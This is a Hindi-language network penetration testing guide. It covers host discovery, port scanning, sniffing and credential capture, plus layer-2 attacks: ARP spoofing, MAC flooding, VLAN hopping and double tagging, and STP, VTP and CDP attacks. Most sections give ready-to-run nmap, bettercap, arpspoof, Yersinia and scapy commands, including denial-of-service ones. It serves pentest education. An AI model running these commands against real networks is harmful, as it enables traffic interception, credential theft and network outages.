Register - IntigritiRegister - Intigriti

बाहर से होस्ट की खोज

यह एक संक्षिप्त खंड होगा जिसमें बताया जाएगा कि इंटरनेट से किसी भी होस्ट को खोजने का तरीका। इस स्थिति में आपके पास कुछ आईपी स्कोप होता है (शायद कई रेंज भी) और आपको कौन से आईपी प्रतिक्रिया दे रहे हैं यह पता करना है।

ICMP

यह होस्ट उप है या नहीं, यह जानने का सबसे आसान और तेज़ तरीका है। आप कुछ ICMP पैकेट भेजने की कोशिश कर सकते हैं और प्रतिक्रिया की उम्मीद कर सकते हैं। सबसे आसान तरीका एक इको अनुरोध भेजना है और प्रतिक्रिया की उम्मीद करना है। आप इसे एक साधारण ping या रेंज के लिए fping का उपयोग करके कर सकते हैं। आप nmap भी इस्तेमाल कर सकते हैं अन्य प्रकार के ICMP पैकेट भेजने के लिए (यह सामान्य ICMP इको अनुरोध-प्रतिक्रिया को फ़िल्टर करेगा)।

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP पोर्ट खोज

बहुत सामान्य है कि सभी प्रकार के ICMP पैकेट्स को फ़िल्टर किया जा रहा है। इसके बाद, आपके पास केवल खुले पोर्ट्स ढूंढने का प्रयास करना है। प्रत्येक होस्ट में 65535 पोर्ट्स होते हैं, इसलिए, अगर आपके पास "बड़ी" स्कोप है तो आप हर होस्ट के हर पोर्ट का जांच करने के लिए समय नहीं ले सकते, यह बहुत अधिक समय लेगा। इसलिए, आपको एक तेज पोर्ट स्कैनर (masscan) और अधिक प्रयोग किए जाने वाले पोर्ट्स की सूची की आवश्यकता है:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

HTTP पोर्ट खोज

यह एक TCP पोर्ट खोज है जो जब आप HTTP सेवाओं की खोज पर ध्यान केंद्रित करना चाहते हैं।

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP पोर्ट खोज

आप यह भी जांच सकते हैं कि क्या कोई UDP पोर्ट खुला है ताकि आप एक होस्ट पर अधिक ध्यान देने का निर्णय ले सकें। UDP सेवाएं आम तौर पर किसी डेटा के साथ किसी नियमित खाली UDP प्रोब पैकेट का प्रतिक्रिया नहीं करती हैं, इसलिए यह कठिन है कि क्या पोर्ट फ़िल्टर किया जा रहा है या खुला है। इसे निर्धारित करने का सबसे सरल तरीका यह है कि चल रही सेवा से संबंधित एक पैकेट भेजें, और जैसा कि आपको नहीं पता कि कौन सी सेवा चल रही है, आपको पोर्ट नंबर के आधार पर सबसे संभावित कोशिश करनी चाहिए:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

नीचे प्रस्तावित nmap लाइन हर होस्ट में /24 रेंज के शीर्ष 1000 UDP पोर्ट का परीक्षण करेगी, लेकिन यह भी केवल इसके लिए >20 मिनट लेगा। यदि तेज़ नतीजे चाहिए तो आप udp-proto-scanner का उपयोग कर सकते हैं: ./udp-proto-scanner.pl 199.66.11.53/24 यह इन UDP प्रोब्स को उनके अपेक्षित पोर्ट पर भेजेगा (एक /24 रेंज के लिए यह सिर्फ 1 मिनट लेगा): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP पोर्ट खोज

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

WiFi पेंटेस्टिंग

यहाँ आपको लेखन के समय सभी प्रसिद्ध WiFi हमलों का एक अच्छा मार्गदर्शन मिलेगा:

अंदर से होस्ट की खोज

अगर आप नेटवर्क के अंदर हैं तो आपको पहली बार करना चाहिए अन्य होस्ट की खोज. आपके पास कितनी शोर की आवश्यकता है, इस पर निर्भर करता है, विभिन्न क्रियाएँ की जा सकती हैं:

निष्क्रिय

आप इन उपकरणों का उपयोग करके जुड़े नेटवर्क के अंदर होस्ट की खोज कर सकते हैं:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

सक्रिय

नोट करें कि तकनीकें जो बाहर से होस्ट की खोज (TCP/HTTP/UDP/SCTP पोर्ट खोज) में टिप्पणी की गई हैं, वे यहाँ भी लागू की जा सकती हैं। लेकिन, जैसा कि आप दूसरे होस्ट के समान नेटवर्क में हैं, आप अधिक चीजें कर सकते हैं:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

सक्रिय ICMP

ध्यान दें कि बाहर से होस्ट की खोज में टिप्पणीत तकनीकें (ICMP) यहाँ भी लागू की जा सकती हैं। लेकिन, आप दूसरे होस्ट्स के साथ एक ही नेटवर्क में हैं, तो आप अधिक चीजें कर सकते हैं:

• यदि आप एक सबनेट ब्रॉडकास्ट पते पर पिंग करते हैं तो पिंग प्रत्येक होस्ट तक पहुंचना चाहिए और वे आपको प्रतिक्रिया दे सकते हैं: ping -b 10.10.5.255

• नेटवर्क ब्रॉडकास्ट पते पर पिंग करके आप अन्य सबनेट्स में होस्ट्स भी खोज सकते हैं: ping -b 255.255.255.255

• nmap के -PE, -PP, -PM फ्लैग्स का उपयोग करके होस्ट खोज करने के लिए ICMPv4 इको, टाइमस्टैम्प, और सबनेट मास्क अनुरोध भेजने के लिए: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

वेक ऑन लैन

वेक ऑन लैन का उपयोग नेटवर्क संदेश के माध्यम से कंप्यूटर्स को चालू करने के लिए किया जाता है। कंप्यूटर को चालू करने के लिए उपयोग किया जाने वाला जादू का पैकेट केवल एक पैकेट है जिसमें एक MAC Dst प्रदान किया जाता है और फिर यह 16 बार दोहराया जाता है। फिर इस प्रकार के पैकेट्स आम तौर पर एक इथरनेट 0x0842 या पोर्ट 9 पर यूडीपी पैकेट में भेजे जाते हैं। यदि कोई [MAC] प्रदान नहीं किया गया है, तो पैकेट ब्रॉडकास्ट इथरनेट पर भेजा जाता है (और दोहराया जाने वाला मैक उसी होगा)।

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

होस्ट स्कैन करना

जब आपने सभी आईपी (बाहरी या आंतरिक) का पता लगाया है जिन्हें आप गहराई से स्कैन करना चाहते हैं, तो विभिन्न क्रियाएँ की जा सकती हैं।

TCP

• खुला पोर्ट: SYN --> SYN/ACK --> RST

• बंद पोर्ट: SYN --> RST/ACK

• फ़िल्टर किया गया पोर्ट: SYN --> [कोई प्रतिक्रिया नहीं]

• फ़िल्टर किया गया पोर्ट: SYN --> ICMP संदेश

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

UDP पोर्ट स्कैन करने के लिए 2 विकल्प हैं:

• UDP पैकेट भेजें और जांचें कि क्या पोर्ट बंद है अगर ICMP unreachable का प्रतिक्रिया मिलता है (कई मामलों में ICMP फ़िल्टर होगा, इसलिए यदि पोर्ट बंद या खुला है तो आपको कोई जानकारी प्राप्त नहीं होगी)।

• फॉर्मेटेड डेटाग्राम भेजें ताकि एक सेवा से प्रतिक्रिया प्राप्त हो (जैसे, DNS, DHCP, TFTP, और अन्य, जैसे कि nmap-payloads में सूचीबद्ध है)। यदि आपको प्रतिक्रिया मिलती है, तो पोर्ट खुला है।

Nmap "-sV" का उपयोग करके दोनों विकल्पों का मिश्रण करेगा (UDP स्कैन बहुत धीमा होता है), लेकिन ध्यान दें कि UDP स्कैन TCP स्कैन से धीमा होता है:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP स्कैन

SCTP (स्ट्रीम नियंत्रण प्रसारण प्रोटोकॉल) का उपयोग TCP (प्रसारण नियंत्रण प्रोटोकॉल) और UDP (उपयोगकर्ता डेटाग्राम प्रोटोकॉल) के साथ किया जाने के लिए डिज़ाइन किया गया है। इसका मुख्य उद्देश्य टेलीफोनी डेटा को आईपी नेटवर्क पर पहुंचाने में सहायता करना है, जो सिग्नलिंग सिस्टम 7 (SS7) में पाए जाने वाले कई विश्वसनीयता सुविधाओं का प्रतिबिम्बित करता है। SCTP SIGTRAN प्रोटोकॉल परिवार का एक मौलिक घटक है, जिसका उद्देश्य आईपी नेटवर्क पर SS7 सिग्नल को पहुंचाना है।

SCTP का समर्थन IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, और VxWorks जैसे विभिन्न ऑपरेटिंग सिस्टम द्वारा प्रदान किया जाता है, जो इसकी व्यापक स्वीकृति और उपयोगिता को दर्शाता है टेलीकम्यूनिकेशन और नेटवर्किंग के क्षेत्र में।

nmap द्वारा SCTP के लिए दो विभिन्न स्कैन प्रदान किए जाते हैं: -sY और -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS और IPS उपाय

और nmap विकल्प

आंतरिक आईपी पते का पता लगाना

गलत रूप से कॉन्फ़िगर किए गए राउटर, फ़ायरवॉल और नेटवर्क डिवाइसेस कभी-कभी गैर सार्वजनिक स्रोत पतों का उपयोग करके नेटवर्क प्रोब्स का जवाब देते हैं। tcpdump का उपयोग टेस्टिंग के दौरान गैर सार्वजनिक पतों से प्राप्त पैकेट्स की पहचान के लिए किया जा सकता है। विशेष रूप से, Kali Linux पर, पैकेट्स को eth2 इंटरफेस पर कैप्चर किया जा सकता है, जो सार्वजनिक इंटरनेट से एक्सेस करने के लिए है। यह महत्वपूर्ण है कि यदि आपका सेटअप एक NAT या फ़ायरवॉल के पीछे है, तो ऐसे पैकेट्स को फ़िल्टर किया जाने की संभावना है।

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

स्निफिंग

स्निफिंग के जरिए आप कैप्चर किए गए फ्रेम और पैकेट की समीक्षा करके आईपी रेंज, सबनेट साइज़, एमएसी पते और होस्टनेम्स के विवरण सीख सकते हैं। अगर नेटवर्क गलती से कॉन्फ़िगर किया गया है या स्विचिंग फैब्रिक तनाव में है, तो हमलावर पैसिव नेटवर्क स्निफिंग के माध्यम से संवेदनशील सामग्री को कैप्चर कर सकते हैं।

यदि एक स्विच्ड इथरनेट नेटवर्क सही ढंग से कॉन्फ़िगर किया गया है, तो आप केवल ब्रॉडकास्ट फ्रेम और आपके एमएसी पते के लिए निर्धारित सामग्री देखेंगे।

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

एक व्यक्ति एक SSH सत्र के माध्यम से वायरशार्क का उपयोग करके वायरशार्क में वास्तविक समय में GUI के साथ रिमोट मशीन से पैकेट कैप्चर कर सकता है।

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

बेहतर कैप

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

स्पष्ट है।

क्रेडेंशियल कैप्चर

आप https://github.com/lgandx/PCredz जैसे उपकरणों का उपयोग कर सकते हैं ताकि आप pcap या लाइव इंटरफेस से क्रेडेंशियल को पार्स कर सकें।

LAN हमले

ARP स्पूफिंग

ARP स्पूफिंग में नि:शुल्क ARPResponses भेजने पर आधारित है जिससे स्पष्ट हो कि किसी मशीन का IP हमारी डिवाइस का MAC है। फिर, पीड़ित व्यक्ति ARP तालिका बदल देगा और जब भी वह IP स्पूफ करने के लिए संपर्क करना चाहेगा तो हमारी मशीन से संपर्क करेगा।

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

आर्पीस्पूफ

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC भराई - CAM ओवरफ्लो

स्विच की CAM तालिका को ओवरफ्लो करें और विभिन्न स्रोत MAC पते के साथ बहुत सारे पैकेट भेजें। जब CAM तालिका भर जाती है, तो स्विच हब की तरह व्यवहार करना शुरू कर देता है (सभी ट्रैफिक को ब्रॉडकास्ट करना)।

macof -i <interface>

802.1Q VLAN / DTP हमले

डायनामिक ट्रंकिंग

डायनामिक ट्रंकिंग प्रोटोकॉल (DTP) एक लिंक परत प्रोटोकॉल के रूप में डिज़ाइन किया गया है जो एक स्वचालित प्रणाली को सुविधा प्रदान करता है जिससे ट्रंकिंग के लिए स्विचेस स्वचालित रूप से पोर्ट का चयन कर सकें (ट्रंक) या गैर-ट्रंकिंग मोड के लिए। DTP का डिप्लॉयमेंट अक्सर उपयुक्त नेटवर्क डिज़ाइन के रूप में देखा जाता है, जिससे ट्रंक केवल वहाँ आवश्यक होने पर हाथ से कॉन्फ़िगर किए जाएं और सही दस्तावेज़ीकरण सुनिश्चित किया जाए।

डिफ़ॉल्ट रूप से, स्विच पोर्ट्स को डायनामिक ऑटो मोड में सेट किया जाता है, जिसका मतलब है कि वे त्रंकिंग को प्रोम्प्ट करने पर तैयार हैं यदि एक पड़ोसी स्विच द्वारा प्रोत्साहित किया जाए। एक सुरक्षा चिंता उत्पन्न होती है जब एक पेंटेस्टर या हमलावर स्विच से कनेक्ट करता है और एक DTP इच्छुक फ्रेम भेजता है, जिससे पोर्ट ट्रंक मोड में प्रवेश करता है। यह कार्रवाई हमलावर को STP फ्रेम विश्लेषण के माध्यम से VLANs की जांच करने और वर्चुअल इंटरफेस सेट करके VLAN सेगमेंटेशन को ऊपर से छलना करने की संभावना देती है।

डिफ़ॉल्ट रूप से कई स्विचों में DTP की मौजूदगी का शत्रु द्वारा उपयोग किया जा सकता है ताकि वे एक स्विच के व्यवहार को मिमिक कर सकें, इसके फलस्वरूप सभी VLANs के ट्रैफ़िक तक पहुंच प्राप्त कर सकते हैं। स्क्रिप्ट dtpscan.sh का उपयोग इंटरफेस को मॉनिटर करने के लिए किया जाता है, जिससे पता चलता है कि स्विच डिफ़ॉल्ट, ट्रंक, डायनामिक, ऑटो, या एक्सेस मोड में है—जिसमें से केवल अंतिम कॉन्फ़िगरेशन VLAN हॉपिंग हमलों से मुक्त है। यह उपकरण स्विच की भेद्यता स्थिति का मूल्यांकन करता है।

यदि नेटवर्क की भेद्यता पहचानी जाती है, तो Yersinia उपकरण का उपयोग किया जा सकता है "ट्रंकिंग सक्षम" करने के लिए DTP प्रोटोकॉल के माध्यम से, जिससे सभी VLANs से पैकेट्स का अवलोकन किया जा सकता है।

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

VLANs की जांच करने के लिए DTPHijacking.py** स्क्रिप्ट के साथ DTP इच्छुक फ्रेम उत्पन्न करना भी संभव है। इस स्क्रिप्ट को किसी भी परिस्थितियों में बाधित न करें। यह हर तीन सेकंड में DTP इच्छुक को इंजेक्ट करता है। स्विच पर डायनेमिक रूप से बनाए गए ट्रंक चैनल केवल पांच मिनट के लिए रहते हैं। पांच मिनट के बाद, ट्रंक गिर जाता है।

sudo python3 DTPHijacking.py --interface eth0

मैं यह दर्शाना चाहूंगा कि Access/Desirable (0x03) इसका संकेत देता है कि डीटीपी फ्रेम वांछनीय प्रकार का है, जो पोर्ट को ट्रंक मोड पर स्विच करने के लिए कहता है। और 802.1Q/802.1Q (0xa5) इसका संकेत देता है 802.1Q एन्कैप्सुलेशन प्रकार।

STP फ्रेम का विश्लेषण करके, हमें VLAN 30 और VLAN 60 के अस्तित्व के बारे में पता चलता है।

विशेष VLAN पर हमला

एक बार जब आप VLAN आईडी और आईपी मानों को जान लेते हैं, तो आप एक विशेष VLAN पर हमला करने के लिए एक वर्चुअल इंटरफेस कॉन्फ़िगर कर सकते हैं। अगर DHCP उपलब्ध नहीं है, तो स्थिर आईपी पता सेट करने के लिए ifconfig का उपयोग करें।

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

स्वचालित VLAN हॉपर

डायनामिक ट्रंकिंग और वर्चुअल इंटरफेस बनाना और अन्य VLAN में होस्ट्स की खोज की चर्चा किया गया हमला स्वचालित रूप से उपकरण द्वारा किया जाता है: https://github.com/nccgroup/vlan-hopping---frogger

डबल टैगिंग

यदि किसी हमलावर को पीड़ित होस्ट के MAC, IP और VLAN ID की मान्यता पता है, तो वह एक फ्रेम को अपने निर्धारित VLAN और पीड़ित के VLAN के साथ डबल टैग करने का प्रयास कर सकता है और एक पैकेट भेज सकता है। क्योंकि पीड़ित आक्रमणकर्ता से वापस कनेक्ट नहीं कर पाएगा, इसलिए हमलावर के लिए सर्वोत्तम विकल्प है UDP के माध्यम से संचार करना जो कुछ दिलचस्प क्रियाएँ कर सकते हैं (जैसे SNMP)।

हमलावर के लिए एक और विकल्प है कि वह एक TCP पोर्ट स्कैन लॉन्च करे जो एक आक्रमणकर्ता द्वारा नियंत्रित एवं पीड़ित द्वारा पहुंचने योग्य IP का धोखा देने वाला हो (संभावित रूप से इंटरनेट के माध्यम से)। फिर, हमलावर दूसरे होस्ट में स्निफ कर सकता है यदि वह पीड़ित से कुछ पैकेट प्राप्त करता है।

इस हमले को करने के लिए आप scapy का उपयोग कर सकते हैं: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

लेटरल VLAN सेगमेंटेशन बायपास

यदि आपके डायरेक्टली कनेक्टेड स्विच तक पहुंचने का एक्सेस है, तो आपके पास नेटवर्क में VLAN सेगमेंटेशन को बायपास करने की क्षमता है। बस पोर्ट को ट्रंक मोड में स्विच करें (जिसे ट्रंक के रूप में भी जाना जाता है), लक्षित VLANs के आईडी के साथ वर्चुअल इंटरफेस बनाएं, और एक आईपी पता कॉन्फ़िगर करें। आप आईपी पता का अनुरोध डायनामिक रूप से करने की कोशिश कर सकते हैं (डीएचसीपी) या आप इसे स्थिर रूप से कॉन्फ़िगर कर सकते हैं। यह मामले पर निर्भर करता है।

लेयर 3 प्राइवेट VLAN बायपास

कुछ वातावरणों में, जैसे मेहमान वायरलेस नेटवर्क, पोर्ट आइसोलेशन (जिसे प्राइवेट VLAN के रूप में भी जाना जाता है) सेटिंग्स का अमल किया जाता है ताकि वायरलेस एक्सेस प्वाइंट से कनेक्टेड क्लाइंट्स सीधे एक-दूसरे से संचार करने से रोका जा सके। हालांकि, एक तकनीक की पहचान की गई है जो इन आइसोलेशन उपायों को दौर कर सकती है। यह तकनीक नेटवर्क ACLs की कमी या उनके गलत कॉन्फ़िगरेशन का शिकार होती है, जिससे आईपी पैकेट्स को राउटर के माध्यम से एक अन्य क्लाइंट तक पहुंचाया जा सकता है।

हमला इसलिए किया जाता है क्योंकि एक पैकेट बनाया जाता है जिसमें गंतव्य क्लाइंट का आईपी पता होता है लेकिन राउटर का मैक पता होता है। इससे राउटर गलती से पैकेट को लक्षित क्लाइंट तक फॉरवर्ड करता है। यह उपाय डबल टैगिंग हमलों में उपयोग किया जाने वाले उसी के समान है, जहां पीड़ित के लिए पहुंचने योग्य होस्ट को नियंत्रित करने की क्षमता का उपयोग सुरक्षा दोष का शिकार होता है।

हमले की मुख्य कदम:

1. पैकेट तैयार करना: एक पैकेट विशेष रूप से तैयार किया जाता है जिसमें लक्षित क्लाइंट का आईपी पता होता है लेकिन राउटर का मैक पता होता है।

2. राउटर व्यवहार का शोषण करना: तैयार किया गया पैकेट राउटर तक भेजा जाता है, जो कॉन्फ़िगरेशन के कारण, प्राइवेट VLAN सेटिंग्स द्वारा प्रदान की गई आइसोलेशन को दौर करते हुए पैकेट को लक्षित क्लाइंट तक पहुंचाता है।

VTP हमले

VTP (VLAN Trunking Protocol) VLAN प्रबंधन को केंद्रीकृत करता है। यह VLAN डेटाबेस अखंडता बनाए रखने के लिए संशोधन संख्याओं का उपयोग करता है; किसी भी संशोधन से यह संख्या बढ़ जाती है। स्विच उच्च संशोधन संख्याओं के साथ कॉन्फ़िगरेशन अपनाते हैं, अपनी खुद की VLAN डेटाबेस को अपडेट करते हैं।

VTP डोमेन भूमिकाएँ

• VTP सर्वर: VLANs का प्रबंधन करता है—बनाता है, हटाता है, संशोधित करता है। यह डोमेन सदस्यों को VTP घोषणाएँ प्रसारित करता है।

• VTP क्लाइंट: अपनी VLAN डेटाबेस को समक्रमित करने के लिए VTP घोषणाएँ प्राप्त करता है। यह भूमिका स्थानीय VLAN कॉन्फ़िगरेशन संशोधनों से प्रतिबंधित है।

• VTP पारदर्शी: VTP अपडेट में शामिल नहीं होता लेकिन VTP घोषणाएँ फॉरवर्ड करता है। VTP हमलों से प्रभावित नहीं होता, यह शून्य की एक स्थिर संशोधन संख्या बनाए रखता है।

VTP विज्ञापन प्रकार

• सारांश विज्ञापन: VTP सर्वर द्वारा हर 300 सेकंड में प्रसारित किया जाता है, महत्वपूर्ण डोमेन सूचना लेकर।

• सबसेट विज्ञापन: VLAN कॉन्फ़िगरेशन परिवर्तनों के बाद भेजा जाता है।

• विज्ञापन अनुरोध: एक VTP क्लाइंट द्वारा एक सारांश विज्ञापन का अनुरोध किया जाता है, सामान्यत: एक उच्च कॉन्फ़िगरेशन संशोधन संख्या का पता लगाने के उत्तर में।

VTP कमजोरियां केवल ट्रंक पोर्ट्स के माध्यम से उपयोग किए जा सकते हैं क्योंकि VTP घोषणाएँ केवल उनके माध्यम से प्रसारित होती हैं। DTP हमले के स्थितियों के बाद VTP की ओर मोड़ सकते हैं। यर्सिनिया जैसे उपकरण VTP हमलों को सुविधाजनक बना सकते हैं, जो वीएलएन डेटाबेस को मिटा सकते हैं, नेटवर्क को प्रभावी रूप से विघटित करते हैं।

ध्यान दें: यह चर्चा VTP संस्करण 1 (VTPv1) से संबंधित है।

%% yersinia -G # Launch Yersinia in graphical mode ```

STP हमले

यदि आप अपने इंटरफेस पर BPDU फ्रेम कैप्चर नहीं कर सकते हैं, तो STP हमले में सफल होना असंभव है।

STP BPDU डीओएस

बहुत सारे BPDUs TCP (टोपोलॉजी चेंज नोटिफिकेशन) या Conf (जब टोपोलॉजी बनाई जाती है तो भेजे जाने वाले BPDUs) भेजकर स्विच को ओवरलोड कर देते हैं और सही ढंग से काम करना बंद कर देते हैं।

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP हमला

जब एक TCP भेजा जाता है, स्विचों की CAM तालिका 15 सेकंड में हटा दी जाएगी। फिर, यदि आप लगातार इस प्रकार के पैकेट भेज रहे हैं, तो CAM तालिका लगातार पुनः प्रारंभ हो जाएगी (या हर 15 सेकंड में) और जब यह पुनः प्रारंभ होती है, स्विच हब के रूप में व्यवहार करता है।

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP रूट हमला

हमलावादी नेटवर्क के STP रूट बनने के लिए स्विच के व्यवहार का अनुकरण करता है। फिर, अधिक डेटा उसके माध्यम से गुजरेगा। यह दो विभिन्न स्विचों से कनेक्ट किए जाने पर दिलचस्प होता है। इसे वास्तविक रूट स्विच की वास्तविक प्राथमिकता से कम प्राथमिकता मान कर BPDUs CONF पैकेट भेजकर किया जाता है।

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

यदि हमलावार 2 स्विच से कनेक्ट हैं तो वह नए पेड़ की जड़ बन सकता है और उस दोनों स्विच के बीच का सभी ट्रैफिक उसके माध्यम से होगा (एक MITM हमला किया जाएगा)।

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP हमले

CISCO डिस्कवरी प्रोटोकॉल (CDP) CISCO उपकरणों के बीच संचार के लिए आवश्यक है, जो उन्हें पहचानने और विन्यास विवरण साझा करने की अनुमति देता है।

पैसिव डेटा संग्रहण

CDP को सभी पोर्टों के माध्यम से जानकारी प्रसारित करने के लिए कॉन्फ़िगर किया जाता है, जो एक सुरक्षा जोखिम की ओर ले जा सकता है। एक हमलावर, स्विच पोर्ट से कनेक्ट करने पर, Wireshark, tcpdump, या Yersinia जैसे नेटवर्क स्निफर्स का उपयोग कर सकता है। यह कार्रवाई नेटवर्क उपकरण के बारे में संवेदनशील डेटा प्रकट कर सकती है, जिसमें इसका मॉडल और Cisco IOS का संस्करण शामिल है। हमलावर फिर पहचाने गए Cisco IOS संस्करण में विशेष दुरुपयोग कर सकता है।

CDP तालिका भराई को उत्प्रेरित करना

एक अधिक प्रवृत्त दृष्टिकोण एक डेनायल ऑफ सर्विस (DoS) हमला चालू करना है जिसमें स्विच की स्मृति को भर देने के द्वारा, वास्तविक CISCO उपकरणों की भाँति बनने का दिखावा करते हुए। नीचे एक कमांड क्रम है जिसका उपयोग करके Yersinia का उपयोग करके ऐसा हमला आरंभ करने के लिए:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

इस हमले के दौरान, स्विच की सीपीयू और सीडीपी पड़ोसी सारणी भारी हो जाती है, जिससे अधिक संसाधन उपभोग होने के कारण अक्सर “नेटवर्क विलंब” के रूप में संदर्भित किया जाता है।

CDP अनुरूपण हमला

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

आप scapy का उपयोग भी कर सकते हैं। scapy/contrib पैकेज के साथ इसे इंस्टॉल करने का ध्यान रखें।

VoIP हमले और VoIP Hopper टूल

